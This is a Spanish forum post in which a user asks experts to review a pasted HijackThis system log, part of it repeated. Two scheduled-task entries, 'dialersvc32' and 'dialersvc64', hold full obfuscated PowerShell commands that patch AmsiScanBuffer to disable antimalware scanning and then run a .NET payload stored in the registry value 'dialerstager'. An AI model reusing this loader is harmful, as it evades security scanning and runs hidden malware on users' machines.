Autor
Pues eso... queria la auida de algún experto a ver si detecta algo raro en mi log.
Gracias por leerme
Citar
Boot mode: Normal
Running processes:
Number | Path
1 C:\Program Files (x86)\Advanced SystemCare Pro\ASCService.exe
1 C:\Program Files (x86)\Letasoft Sound Booster\SoundBooster.exe
1 C:\Program Files (x86)\Letasoft Sound Booster\SoundBoosterHelper.exe
1 C:\Program Files (x86)\RocketDock\RocketDock.exe
11 C:\Program Files\Mozilla Firefox\firefox.exe
4 C:\Program Files\Mozilla Thunderbird\thunderbird.exe
1 C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2203.5-0\MsMpEng.exe
1 C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2203.5-0\NisSrv.exe
1 C:\Windows\System32\DriverStore\FileRepository\dal.inf_amd64_b5484efd38adbe8d\jhi_service.exe
1 C:\Windows\System32\DriverStore\FileRepository\lms.inf_amd64_fddb643595e0b8d0\LMS.exe
3 C:\Windows\System32\RuntimeBroker.exe
1 C:\Windows\System32\SearchIndexer.exe
1 C:\Windows\System32\SecurityHealthService.exe
1 C:\Windows\System32\SgrmBroker.exe
1 C:\Windows\System32\SystemSettingsBroker.exe
1 C:\Windows\System32\audiodg.exe
1 C:\Windows\System32\conhost.exe
2 C:\Windows\System32\csrss.exe
1 C:\Windows\System32\ctfmon.exe
2 C:\Windows\System32\dasHost.exe
1 C:\Windows\System32\dwm.exe
2 C:\Windows\System32\fontdrvhost.exe
1 C:\Windows\System32\lsass.exe
1 C:\Windows\System32\services.exe
1 C:\Windows\System32\sihost.exe
1 C:\Windows\System32\smartscreen.exe
1 C:\Windows\System32\smss.exe
1 C:\Windows\System32\spoolsv.exe
74 C:\Windows\System32\svchost.exe
1 C:\Windows\System32\taskhostw.exe
2 C:\Windows\System32\wbem\WmiPrvSE.exe
1 C:\Windows\System32\wininit.exe
1 C:\Windows\System32\winlogon.exe
1 C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
1 C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
1 C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TextInputHost.exe
1 C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe
1 C:\Windows\explorer.exe
1 D:\02_TRANSITO\01_ARCHIVOS_INTERNET_24_09_19\02_Seguridad\hijackthis\HijackThis.exe
O2 - HKLM\..\BHO: Adobe Acrobat Create PDF Helper - {AE7CD045-E861-484f-8273-0445EE161910} - C:\Program Files (x86)\Common Files\Adobe\Acrobat\WCIEActiveX\DC\x64\AcroIEFavStub.dll (file missing)
O2 - HKLM\..\BHO: IEToEdge BHO - {1FD49718-1D00-4B19-AF5F-070AF6D5D54C} - C:\Program Files (x86)\Microsoft\Edge\Application\100.0.1185.44\BHO\ie_to_edge_bho_64.dll
O2 - HKLM\..\BHO: Java(tm) Plug-In 2 SSV Helper - {DBC80044-A445-435b-BC74-9C25C1C588A9} - C:\Program Files\Java\jre1.8.0_291\bin\jp2ssv.dll
O2 - HKLM\..\BHO: Java(tm) Plug-In SSV Helper - {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} - C:\Program Files\Java\jre1.8.0_291\bin\ssv.dll
O2 - HKLM\..\BHO: SmartSelect - {F4971EE7-DAA0-4053-9964-665D8EE6A077} - C:\Program Files (x86)\Common Files\Adobe\Acrobat\WCIEActiveX\DC\x64\AcroIEFavStub.dll (file missing)
O2-32 - HKLM\..\BHO: Adobe Acrobat Create PDF Helper - {AE7CD045-E861-484f-8273-0445EE161910} - C:\Program Files (x86)\Common Files\Adobe\Acrobat\WCIEActiveX\DC\AcroIEFavStub.dll (file missing)
O2-32 - HKLM\..\BHO: IEToEdge BHO - {1FD49718-1D00-4B19-AF5F-070AF6D5D54C} - C:\Program Files (x86)\Microsoft\Edge\Application\100.0.1185.44\BHO\ie_to_edge_bho.dll
O2-32 - HKLM\..\BHO: SmartSelect - {F4971EE7-DAA0-4053-9964-665D8EE6A077} - C:\Program Files (x86)\Common Files\Adobe\Acrobat\WCIEActiveX\DC\AcroIEFavStub.dll (file missing)
O4 - HKCU\..\Run: [RocketDock] = C:\Program Files (x86)\RocketDock\RocketDock.exe
O4 - HKLM\..\Session Manager: [BootExecute] = C:\WINDOWS\system32\autochk.exe /p \??\E:
O4 - HKLM\..\Session Manager: [BootExecute] = autocheck autochk * (file missing)
O4 - HKLM\..\StartupApproved\Run: [RTHDVCPL] = C:\Program Files\Realtek\Audio\HDA\RtkNGUI64.exe -s (2020/03/15)
O4 - User Startup: C:\Users\JPD_TOWER\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SoundBooster.exe.lnk -> C:\Program Files (x86)\Letasoft Sound Booster\SoundBooster.exe
O15 - Trusted Zone: *.localhost
O15 - Trusted Zone: https://www.registradores.org
O17 - DHCP DNS 1: 212.166.211.4
O17 - DHCP DNS 2: 212.166.132.96
O18 - HKLM\Software\Classes\Protocols\Handler\ms-help: [CLSID] = {314111C7-A502-11D2-BBCA-00C04F8EC294} - C:\Program Files\Common Files\Microsoft Shared\Help\hxds.dll
O21 - HKLM\..\ShellIconOverlayIdentifiers\ OneDrive1: (no name) - {BBACC218-34EA-4666-9D7A-C78F2274A524} - (no file)
O21 - HKLM\..\ShellIconOverlayIdentifiers\ OneDrive2: (no name) - {5AB7172C-9C11-405C-8DD5-AF20F3606282} - (no file)
O21 - HKLM\..\ShellIconOverlayIdentifiers\ OneDrive3: (no name) - {A78ED123-AB77-406B-9962-2A5D9D2F7F30} - (no file)
O21 - HKLM\..\ShellIconOverlayIdentifiers\ OneDrive4: (no name) - {F241C880-6982-4CE5-8CF7-7085BA96DA5A} - (no file)
O21 - HKLM\..\ShellIconOverlayIdentifiers\ OneDrive5: (no name) - {A0396A93-DC06-4AEF-BEE9-95FFCCAEF20E} - (no file)
O21 - HKLM\..\ShellIconOverlayIdentifiers\ OneDrive6: (no name) - {9AA2F32D-362A-42D9-9328-24A483E2CCC3} - (no file)
O21 - HKLM\..\ShellIconOverlayIdentifiers\ OneDrive7: (no name) - {C5FF006E-2AE9-408C-B85B-2DFDD5449D9C} - (no file)
O21 - HKLM\..\ShellIconOverlayIdentifiers\00asw: (no name) - {472083B0-C522-11CF-8763-00608CC02F24} - (no file)
O21-32 - HKLM\..\ShellIconOverlayIdentifiers\ OneDrive1: (no name) - {BBACC218-34EA-4666-9D7A-C78F2274A524} - (no file)
O21-32 - HKLM\..\ShellIconOverlayIdentifiers\ OneDrive2: (no name) - {5AB7172C-9C11-405C-8DD5-AF20F3606282} - (no file)
O21-32 - HKLM\..\ShellIconOverlayIdentifiers\ OneDrive3: (no name) - {A78ED123-AB77-406B-9962-2A5D9D2F7F30} - (no file)
O21-32 - HKLM\..\ShellIconOverlayIdentifiers\ OneDrive4: (no name) - {F241C880-6982-4CE5-8CF7-7085BA96DA5A} - (no file)
O21-32 - HKLM\..\ShellIconOverlayIdentifiers\ OneDrive5: (no name) - {A0396A93-DC06-4AEF-BEE9-95FFCCAEF20E} - (no file)
O21-32 - HKLM\..\ShellIconOverlayIdentifiers\ OneDrive6: (no name) - {9AA2F32D-362A-42D9-9328-24A483E2CCC3} - (no file)
O21-32 - HKLM\..\ShellIconOverlayIdentifiers\ OneDrive7: (no name) - {C5FF006E-2AE9-408C-B85B-2DFDD5449D9C} - (no file)
O22 - Task (.job): (disabled) (Not scheduled) CreateExplorerShellUnelevatedTask.job - C:\WINDOWS\explorer.exe /NoUACCheck
O22 - Task (.job): (disabled) dialersvc64.job - C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe "function Local:UzHNWKPXJNtt{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$CbINdIGkKlaWGG,[Parameter(Position=1)][Type]$NsGdjxvggE)$LwujcLParTV=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName('ReflectedDelegate')),[Reflection.Emit.AssemblyBuilderAcce
O22 - Task (.job): dialersvc32.job - C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe "function Local:apixgIwtcgiR{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$wPRQswjtFJXSSW,[Parameter(Position=1)][Type]$owhDaShKYi)$FBvTuZUrqAz=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName('ReflectedDelegate')),[Reflection.Emit.AssemblyBuilderAcce
O22 - Task: (disabled) (update) \Microsoft\Windows\UpdateOrchestrator\Reboot_AC - C:\WINDOWS\system32\MusNotification.exe /RunOnAC RebootDialog (Microsoft)
O22 - Task: (disabled) (update) \Microsoft\Windows\UpdateOrchestrator\Reboot_Battery - C:\WINDOWS\system32\MusNotification.exe /RunOnBattery RebootDialog (Microsoft)
O22 - Task: (disabled) Adobe Acrobat Update Task - C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe
O22 - Task: (disabled) AdvancedUpdater - C:\Program Files (x86)\AW Manager\Windows Manager\Windows Updater.exe /silentall -nofreqcheck -nogui
O22 - Task: (disabled) AdvancedWindowsManager #1 - C:\Program Files (x86)\AW Manager\Windows Manager\AdvancedWindowsManager.exe -v 110 -t 8080
O22 - Task: (disabled) AdvancedWindowsManager #2 - C:\Program Files (x86)\AW Manager\Windows Manager\AdvancedWindowsManager.exe -v 111 -t 8080
O22 - Task: (disabled) AdvancedWindowsManager #3 - C:\Program Files (x86)\AW Manager\Windows Manager\AdvancedWindowsManager.exe -v 112 -t 8080
O22 - Task: (disabled) AdvancedWindowsManager #4 - C:\Program Files (x86)\AW Manager\Windows Manager\AdvancedWindowsManager.exe -v 113 -t 8080
O22 - Task: (disabled) AdvancedWindowsManager #5 - C:\Program Files (x86)\AW Manager\Windows Manager\AdvancedWindowsManager.exe -v 114 -t 8080
O22 - Task: (disabled) AdvancedWindowsManager #6 - C:\Program Files (x86)\AW Manager\Windows Manager\AdvancedWindowsManager.exe -v 115 -t 8080
O22 - Task: (disabled) BlueStacksHelper_nxt - C:\Program Files\BlueStacks_nxt\BlueStacksHelper.exe -sr
O22 - Task: (disabled) \Microsoft\Windows\Management\Provisioning\Retry - C:\WINDOWS\system32\ProvTool.exe /turn 5 /source ProvRetryTask (Microsoft)
O22 - Task: (disabled) \Microsoft\Windows\Management\Provisioning\RunOnReboot - C:\WINDOWS\system32\ProvTool.exe /turn 5 /source ContinueSessionTask (Microsoft)
O22 - Task: (disabled) \Microsoft\Windows\Shell\FamilySafetyMonitorToastTask - {D2CBF5F7-5702-440B-8D8F-8203034A6B82},$(Arg0) - (no file)
O22 - Task: (disabled) \Microsoft\Windows\UpdateOrchestrator\Schedule Maintenance Work - C:\WINDOWS\system32\usoclient.exe StartMaintenanceWork (Microsoft)
O22 - Task: (disabled) \Microsoft\Windows\UpdateOrchestrator\Schedule Wake To Work - C:\WINDOWS\system32\usoclient.exe StartWork (Microsoft)
O22 - Task: (telemetry) \Microsoft\Windows\Application Experience\PcaPatchDbTask - C:\WINDOWS\system32\rundll32.exe C:\WINDOWS\system32\PcaSvc.dll,PcaPatchSdbTask (Microsoft)
O22 - Task: (update) \Microsoft\Windows\UpdateOrchestrator\USO_UxBroker - C:\WINDOWS\system32\MusNotification.exe (Microsoft)
O22 - Task: ASC_SkipUac_JPD_TOWER - C:\Program Files (x86)\Advanced SystemCare Pro\ASC.exe /SkipUac
O22 - Task: GoogleUpdateTaskMachineCore - C:\Program Files (x86)\Google\Update\GoogleUpdate.exe /c
O22 - Task: GoogleUpdateTaskMachineCore1d6ca0a2df327f9 - C:\Program Files (x86)\Google\Update\GoogleUpdate.exe /c
O22 - Task: GoogleUpdateTaskMachineUA - C:\Program Files (x86)\Google\Update\GoogleUpdate.exe /ua /installsource scheduler
O22 - Task: GoogleUpdateTaskMachineUA1d6ca0a2df5f82e - C:\Program Files (x86)\Google\Update\GoogleUpdate.exe /ua /installsource scheduler
O22 - Task: IMF_SkipUAC_JPD_TOWER - C:\Program Files (x86)\IObit\IObit Malware Fighter\IMF.exe /SkipUac
O22 - Task: Intel PTT EK Recertification - C:\WINDOWS\System32\DriverStore\FileRepository\iclsclient.inf_amd64_76523213b78d9046\lib\IntelPTTEKRecertification.exe
O22 - Task: OneDrive Standalone Update Task-S-1-5-21-1640731472-3253829319-3592857273-500 - C:\Users\JPD_TOWER\AppData\Local\Microsoft\OneDrive\OneDriveStandaloneUpdater.exe (file missing)
O22 - Task: OneDrive Standalone Update Task-S-1-5-21-2819557380-2876920998-2071874008-500 - C:\Users\JPD_TOWER\AppData\Local\Microsoft\OneDrive\OneDriveStandaloneUpdater.exe (file missing)
O22 - Task: RealtekHDAudio - C:\WINDOWS\system32\config\systemprofile\AppData\Roaming\Realtek\HD\Update\RealtekHDAudio.exe
O22 - Task: SmartDefrag_AutoAnalyze - C:\Program Files (x86)\IObit\Smart Defr\AutoDefrag.exe /AUTOANALYZE (file missing)
O22 - Task: SmartDefrag_Update - C:\Program Files (x86)\IObit\Smart Defr\AutoUpdate.exe /autorun (file missing)
O22 - Task: \Microsoft\Windows\AppListBackup\Backup - {E0DCC2CC-3354-45F2-8914-519E07809082} - C:\WINDOWS\system32\AppListBackupLauncher.dll (Microsoft)
O22 - Task: \Microsoft\Windows\SMB\UninstallSMB1ClientTask - C:\WINDOWS\system32\WindowsPowerShell\v1.0\powershell.exe -ExecutionPolicy Unrestricted -NonInteractive -NoProfile -WindowStyle Hidden "& C:\WINDOWS\system32\WindowsPowerShell\v1.0\Modules\SmbShare\DisableUnusedSmb1.ps1 -Scenario Client"
O22 - Task: \Microsoft\Windows\SMB\UninstallSMB1ServerTask - C:\WINDOWS\system32\WindowsPowerShell\v1.0\powershell.exe -ExecutionPolicy Unrestricted -NonInteractive -NoProfile -WindowStyle Hidden "& C:\WINDOWS\system32\WindowsPowerShell\v1.0\Modules\SmbShare\DisableUnusedSmb1.ps1 -Scenario Server"
O22 - Task: \Microsoft\Windows\UpdateOrchestrator\AC Power Install - C:\WINDOWS\system32\usoclient.exe StartInstall (Microsoft)
O22 - Task: \Mozilla\Firefox Default Browser Agent 308046B0AF4A39CB - C:\Program Files\Mozilla Firefox\default-browser-agent.exe do-task "308046B0AF4A39CB"
O22 - Task: dialersvc32 - C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe "function Local:apixgIwtcgiR{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$wPRQswjtFJXSSW,[Parameter(Position=1)][Type]$owhDaShKYi)$FBvTuZUrqAz=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName('ReflectedDelegate')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule('InMe'+'mory'+'Module',$False).DefineType('MyDelegateType','Class,Public,Sealed,AnsiClass,AutoClass',[MulticastDelegate]);$FBvTuZUrqAz.DefineConstructor('RTSpecialName,HideBySig,Public',[Reflection.CallingConventions]::Standard,$wPRQswjtFJXSSW).SetImplementationFlags('Runtime,Managed');$FBvTuZUrqAz.DefineMethod('Invoke','Public,HideBySig,NewSlot,Virtual',$owhDaShKYi,$wPRQswjtFJXSSW).SetImplementationFlags('Runtime,Managed');Write-Output $FBvTuZUrqAz.CreateType();}$mJEMOhdwMnPlv=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals('System.dll')}).GetType('Microsoft.Win32.'+'Uns'+'afeNat'+'iveMetho'+'ds');$oGxzdhjRwzOuny=$mJEMOhdwMnPlv.GetMethod('Ge'+'tPr'+'ocAdd'+'ress',[Reflection.BindingFlags]'Public,Static',$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$RMSpemWbeIFtVxWOgIc=apixgIwtcgiR @([String])([IntPtr]);$thwUJXunSMzkqgVKpByquG=apixgIwtcgiR @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$gdNgabHVMcn=$mJEMOhdwMnPlv.GetMethod('Get'+'Modu'+'leHan'+'dle').Invoke($Null,@([Object]('kern'+'el'+'32.dll')));$YpWAVcyICIauve=$oGxzdhjRwzOuny.Invoke($Null,@([Object]$gdNgabHVMcn,[Object]('Load'+'LibraryA')));$toICsynFpdQrZsYGH=$oGxzdhjRwzOuny.Invoke($Null,@([Object]$gdNgabHVMcn,[Object]('Vir'+'tual'+'Pro'+'tect')));$uRHQaoB=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($YpWAVcyICIauve,$RMSpemWbeIFtVxWOgIc).Invoke('a'+'m'+'si.dll');$pBBpMJVXgKwXOjxcU=$oGxzdhjRwzOuny.Invoke($Null,@([Object]$uRHQaoB,[Object]('Ams'+'iSc'+'an'+'Buffer')));$OQpAYpIaDJ=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($toICsynFpdQrZsYGH,$thwUJXunSMzkqgVKpByquG).Invoke($pBBpMJVXgKwXOjxcU,[uint32]8,4,[ref]$OQpAYpIaDJ);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc2,0x18,0),0,$pBBpMJVXgKwXOjxcU,8);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($toICsynFpdQrZsYGH,$thwUJXunSMzkqgVKpByquG).Invoke($pBBpMJVXgKwXOjxcU,[uint32]8,0x20,[ref]$OQpAYpIaDJ);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey('SOFTWARE').GetValue('dialerstager')).EntryPoint.Invoke($Null,$Null)"
O22 - Task: dialersvc64 - C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe "function Local:UzHNWKPXJNtt{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$CbINdIGkKlaWGG,[Parameter(Position=1)][Type]$NsGdjxvggE)$LwujcLParTV=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName('ReflectedDelegate')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule('InMe'+'mory'+'Module',$False).DefineType('MyDelegateType','Class,Public,Sealed,AnsiClass,AutoClass',[MulticastDelegate]);$LwujcLParTV.DefineConstructor('RTSpecialName,HideBySig,Public',[Reflection.CallingConventions]::Standard,$CbINdIGkKlaWGG).SetImplementationFlags('Runtime,Managed');$LwujcLParTV.DefineMethod('Invoke','Public,HideBySig,NewSlot,Virtual',$NsGdjxvggE,$CbINdIGkKlaWGG).SetImplementationFlags('Runtime,Managed');Write-Output $LwujcLParTV.CreateType();}$ImrbaowEdYFgk=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals('System.dll')}).GetType('Microsoft.Win32.'+'Uns'+'afeNat'+'iveMetho'+'ds');$JDrixjmDPdZFyB=$ImrbaowEdYFgk.GetMethod('Ge'+'tPr'+'ocAdd'+'ress',[Reflection.BindingFlags]'Public,Static',$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$xGmqSgGwPVUzXdVZItw=UzHNWKPXJNtt @([String])([IntPtr]);$YORixZZAURGZuYDBLEluRz=UzHNWKPXJNtt @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$BcdkVWHcYRF=$ImrbaowEdYFgk.GetMethod('Get'+'Modu'+'leHan'+'dle').Invoke($Null,@([Object]('kern'+'el'+'32.dll')));$VBIYzMBbTJBPhI=$JDrixjmDPdZFyB.Invoke($Null,@([Object]$BcdkVWHcYRF,[Object]('Load'+'LibraryA')));$SoPZBLQWIJfAtJkFq=$JDrixjmDPdZFyB.Invoke($Null,@([Object]$BcdkVWHcYRF,[Object]('Vir'+'tual'+'Pro'+'tect')));$ANsTbch=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($VBIYzMBbTJBPhI,$xGmqSgGwPVUzXdVZItw).Invoke('a'+'m'+'si.dll');$atJoUAXptWUDZCHOd=$JDrixjmDPdZFyB.Invoke($Null,@([Object]$ANsTbch,[Object]('Ams'+'iSc'+'an'+'Buffer')));$FeUBAfvJCc=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($SoPZBLQWIJfAtJkFq,$YORixZZAURGZuYDBLEluRz).Invoke($atJoUAXptWUDZCHOd,[uint32]8,4,[ref]$FeUBAfvJCc);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$atJoUAXptWUDZCHOd,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($SoPZBLQWIJfAtJkFq,$YORixZZAURGZuYDBLEluRz).Invoke($atJoUAXptWUDZCHOd,[uint32]8,0x20,[ref]$FeUBAfvJCc);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey('SOFTWARE').GetValue('dialerstager')).EntryPoint.Invoke($Null,$Null)"
O23 - Service R2: Advanced SystemCare Service 13 - (AdvancedSystemCareService13) - C:\Program Files (x86)\Advanced SystemCare Pro\ASCService.exe
O23 - Service R2: Intel(R) Dynamic Application Loader Host Interface Service - (jhi_service) - C:\WINDOWS\System32\DriverStore\FileRepository\dal.inf_amd64_b5484efd38adbe8d\jhi_service.exe
O23 - Service R2: Intel(R) Management and Security Application Local Management Service - (LMS) - C:\WINDOWS\System32\DriverStore\FileRepository\lms.inf_amd64_fddb643595e0b8d0\LMS.exe
O23 - Service S2: Intel(R) TPM Provisioning Service - C:\WINDOWS\System32\DriverStore\FileRepository\iclsclient.inf_amd64_76523213b78d9046\lib\TPMProvisioningService.exe
O23 - Service S2: Servicio de Google Update (gupdate) - (gupdate) - C:\Program Files (x86)\Google\Update\GoogleUpdate.exe /svc
O23 - Service S3: Adobe Acrobat Update Service - (AdobeARMservice) - C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
O23 - Service S3: ArcSoft Connect Daemon - (ACDaemon) - C:\Program Files (x86)\Common Files\ArcSoft\Connection Service\Bin\ACService.exe
O23 - Service S3: Bluetooth Driver Management Service - (BcmBtRSupport) - C:\WINDOWS\system32\BtwRSupportService.exe
O23 - Service S3: Brother USB Application Controller - (USBAppControl) - C:\Program Files (x86)\Brother\iPrint&Scan\USBAppControl.exe
O23 - Service S3: Brother Workflow Application Controller - (WorkflowAppControl) - C:\Program Files (x86)\Brother\iPrint&Scan\WorkflowAppControl.exe
O23 - Service S3: Google Chrome Elevation Service (GoogleChromeElevationService) - (GoogleChromeElevationService) - C:\Program Files (x86)\Google\Chrome\Application\100.0.4896.75\elevation_service.exe (file missing)
O23 - Service S3: Intel(R) Capability Licensing Service TCP IP Interface - C:\WINDOWS\System32\DriverStore\FileRepository\iclsclient.inf_amd64_76523213b78d9046\lib\SocketHeciServer.exe
O23 - Service S3: Intel(R) Content Protection HDCP Service - (cplspcon) - C:\WINDOWS\System32\DriverStore\FileRepository\iigd_base.inf_amd64_6facd738cc4484c9\IntelCpHDCPSvc.exe
O23 - Service S3: Intel(R) Content Protection HECI Service - (cphs) - C:\WINDOWS\System32\DriverStore\FileRepository\iigd_base.inf_amd64_6facd738cc4484c9\IntelCpHeciSvc.exe
O23 - Service S3: Letasoft Sound Booster Service - (SoundBoosterService) - C:\Program Files (x86)\Letasoft Sound Booster\SoundBoosterService.exe
O23 - Service S3: Office 64 Source Engine - (ose64) - C:\Program Files\Common Files\Microsoft Shared\Source Engine\OSE.EXE
O23 - Service S3: Servicio de Google Update (gupdatem) - (gupdatem) - C:\Program Files (x86)\Google\Update\GoogleUpdate.exe /medsvc
O23 - Service S3: TeamViewer - C:\Program Files (x86)\TeamViewer\TeamViewer_Service.exe
O23 - Service S3: spacedeskService - C:\WINDOWS\System32\spacedeskService.exe
Running processes:
Number | Path
1 C:\Program Files (x86)\Advanced SystemCare Pro\ASCService.exe
1 C:\Program Files (x86)\Letasoft Sound Booster\SoundBooster.exe
1 C:\Program Files (x86)\Letasoft Sound Booster\SoundBoosterHelper.exe
1 C:\Program Files (x86)\RocketDock\RocketDock.exe
11 C:\Program Files\Mozilla Firefox\firefox.exe
4 C:\Program Files\Mozilla Thunderbird\thunderbird.exe
1 C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2203.5-0\MsMpEng.exe
1 C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2203.5-0\NisSrv.exe
1 C:\Windows\System32\DriverStore\FileRepository\dal.inf_amd64_b5484efd38adbe8d\jhi_service.exe
1 C:\Windows\System32\DriverStore\FileRepository\lms.inf_amd64_fddb643595e0b8d0\LMS.exe
3 C:\Windows\System32\RuntimeBroker.exe
1 C:\Windows\System32\SearchIndexer.exe
1 C:\Windows\System32\SecurityHealthService.exe
1 C:\Windows\System32\SgrmBroker.exe
1 C:\Windows\System32\SystemSettingsBroker.exe
1 C:\Windows\System32\audiodg.exe
1 C:\Windows\System32\conhost.exe
2 C:\Windows\System32\csrss.exe
1 C:\Windows\System32\ctfmon.exe
2 C:\Windows\System32\dasHost.exe
1 C:\Windows\System32\dwm.exe
2 C:\Windows\System32\fontdrvhost.exe
1 C:\Windows\System32\lsass.exe
1 C:\Windows\System32\services.exe
1 C:\Windows\System32\sihost.exe
1 C:\Windows\System32\smartscreen.exe
1 C:\Windows\System32\smss.exe
1 C:\Windows\System32\spoolsv.exe
74 C:\Windows\System32\svchost.exe
1 C:\Windows\System32\taskhostw.exe
2 C:\Windows\System32\wbem\WmiPrvSE.exe
1 C:\Windows\System32\wininit.exe
1 C:\Windows\System32\winlogon.exe
1 C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
1 C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
1 C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TextInputHost.exe
1 C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe
1 C:\Windows\explorer.exe
1 D:\02_TRANSITO\01_ARCHIVOS_INTERNET_24_09_19\02_Seguridad\hijackthis\HijackThis.exe
O2 - HKLM\..\BHO: Adobe Acrobat Create PDF Helper - {AE7CD045-E861-484f-8273-0445EE161910} - C:\Program Files (x86)\Common Files\Adobe\Acrobat\WCIEActiveX\DC\x64\AcroIEFavStub.dll (file missing)
O2 - HKLM\..\BHO: IEToEdge BHO - {1FD49718-1D00-4B19-AF5F-070AF6D5D54C} - C:\Program Files (x86)\Microsoft\Edge\Application\100.0.1185.44\BHO\ie_to_edge_bho_64.dll
O2 - HKLM\..\BHO: Java(tm) Plug-In 2 SSV Helper - {DBC80044-A445-435b-BC74-9C25C1C588A9} - C:\Program Files\Java\jre1.8.0_291\bin\jp2ssv.dll
O2 - HKLM\..\BHO: Java(tm) Plug-In SSV Helper - {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} - C:\Program Files\Java\jre1.8.0_291\bin\ssv.dll
O2 - HKLM\..\BHO: SmartSelect - {F4971EE7-DAA0-4053-9964-665D8EE6A077} - C:\Program Files (x86)\Common Files\Adobe\Acrobat\WCIEActiveX\DC\x64\AcroIEFavStub.dll (file missing)
O2-32 - HKLM\..\BHO: Adobe Acrobat Create PDF Helper - {AE7CD045-E861-484f-8273-0445EE161910} - C:\Program Files (x86)\Common Files\Adobe\Acrobat\WCIEActiveX\DC\AcroIEFavStub.dll (file missing)
O2-32 - HKLM\..\BHO: IEToEdge BHO - {1FD49718-1D00-4B19-AF5F-070AF6D5D54C} - C:\Program Files (x86)\Microsoft\Edge\Application\100.0.1185.44\BHO\ie_to_edge_bho.dll
O2-32 - HKLM\..\BHO: SmartSelect - {F4971EE7-DAA0-4053-9964-665D8EE6A077} - C:\Program Files (x86)\Common Files\Adobe\Acrobat\WCIEActiveX\DC\AcroIEFavStub.dll (file missing)
O4 - HKCU\..\Run: [RocketDock] = C:\Program Files (x86)\RocketDock\RocketDock.exe
O4 - HKLM\..\Session Manager: [BootExecute] = C:\WINDOWS\system32\autochk.exe /p \??\E:
O4 - HKLM\..\Session Manager: [BootExecute] = autocheck autochk * (file missing)
O4 - HKLM\..\StartupApproved\Run: [RTHDVCPL] = C:\Program Files\Realtek\Audio\HDA\RtkNGUI64.exe -s (2020/03/15)
O4 - User Startup: C:\Users\JPD_TOWER\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SoundBooster.exe.lnk -> C:\Program Files (x86)\Letasoft Sound Booster\SoundBooster.exe
O15 - Trusted Zone: *.localhost
O15 - Trusted Zone: https://www.registradores.org
O17 - DHCP DNS 1: 212.166.211.4
O17 - DHCP DNS 2: 212.166.132.96
O18 - HKLM\Software\Classes\Protocols\Handler\ms-help: [CLSID] = {314111C7-A502-11D2-BBCA-00C04F8EC294} - C:\Program Files\Common Files\Microsoft Shared\Help\hxds.dll
O21 - HKLM\..\ShellIconOverlayIdentifiers\ OneDrive1: (no name) - {BBACC218-34EA-4666-9D7A-C78F2274A524} - (no file)
O21 - HKLM\..\ShellIconOverlayIdentifiers\ OneDrive2: (no name) - {5AB7172C-9C11-405C-8DD5-AF20F3606282} - (no file)
O21 - HKLM\..\ShellIconOverlayIdentifiers\ OneDrive3: (no name) - {A78ED123-AB77-406B-9962-2A5D9D2F7F30} - (no file)
O21 - HKLM\..\ShellIconOverlayIdentifiers\ OneDrive4: (no name) - {F241C880-6982-4CE5-8CF7-7085BA96DA5A} - (no file)
O21 - HKLM\..\ShellIconOverlayIdentifiers\ OneDrive5: (no name) - {A0396A93-DC06-4AEF-BEE9-95FFCCAEF20E} - (no file)
